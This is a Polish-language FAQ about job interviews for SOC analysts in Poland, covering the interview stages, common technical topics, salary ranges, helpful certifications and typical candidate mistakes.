- Jak wejść do cybersecurity bez doświadczenia — 4 ścieżki + roadmap 12 miesięcy
- CompTIA Security+ (SY0-701) — jak się przygotować po polsku
- Słownik SOC / blue team — 80 terminów po angielsku
- Rodzaje cyberataków po angielsku — 50+ terminów
- Rozmowa kwalifikacyjna IT po angielsku — 50 pytań + STAR
- Case study CYBERSPEAK — 43 kobiety wchodzą do cyber
FAQ — najczęstsze pytania
Jakie są etapy rozmowy SOC Analyst?
4 etapy: HR phone screen (30 min) → Technical (45-60 min) → Hands-on lab (60-120 min) → Behavioral (45 min). Razem 2-4 tygodnie.
Czy rozmowa jest po angielsku w PL?
W 90% przypadków TAK. Polskie SOC obsługują globalnych klientów. Wymóg: B2+ angielski w mowie i piśmie.
Jakie pytania techniczne najczęściej?
CIA Triad, defense in depth, IDS vs IPS, SIEM, NIST IR fazy, MITRE ATT&CK, TCP/UDP, popularne porty, IOC vs IOA, phishing wariantów, DDoS detection.
Co to jest scenario question?
Symulacja realnej sytuacji: „User clicked phishing", „PowerShell suspicious on prod server". Klucz: containment first, gather evidence, escalate appropriately.
Co to jest live lab?
Praktyczne zadanie: Splunk SPL query, Wireshark PCAP, YARA rule, Linux investigation, Windows Event Log. 60-120 minut.
Realne widełki dla SOC Analyst w PL?
T1 7-12k brutto, T2 12-18k, T3 / Threat Hunter 18-30k, SOC Manager 25-40k. Big Tech +30-50%.
Jakie certyfikaty pomagają?
T1 — Security+ (90% ofert). T2 — Security+ + CySA+ / BTL1. T3 — SANS GIAC, CISSP. Brak certyfikatu wydłuża czas pierwszej oferty o 3-6 miesięcy.
Największe błędy polskich kandydatów?
(1) Brak praktyki scenariuszy, (2) tłumaczenie z polskiego na angielski w trakcie, (3) brak news z branży, (4) unikanie „nie wiem", (5) płytka wiedza o własnych projektach.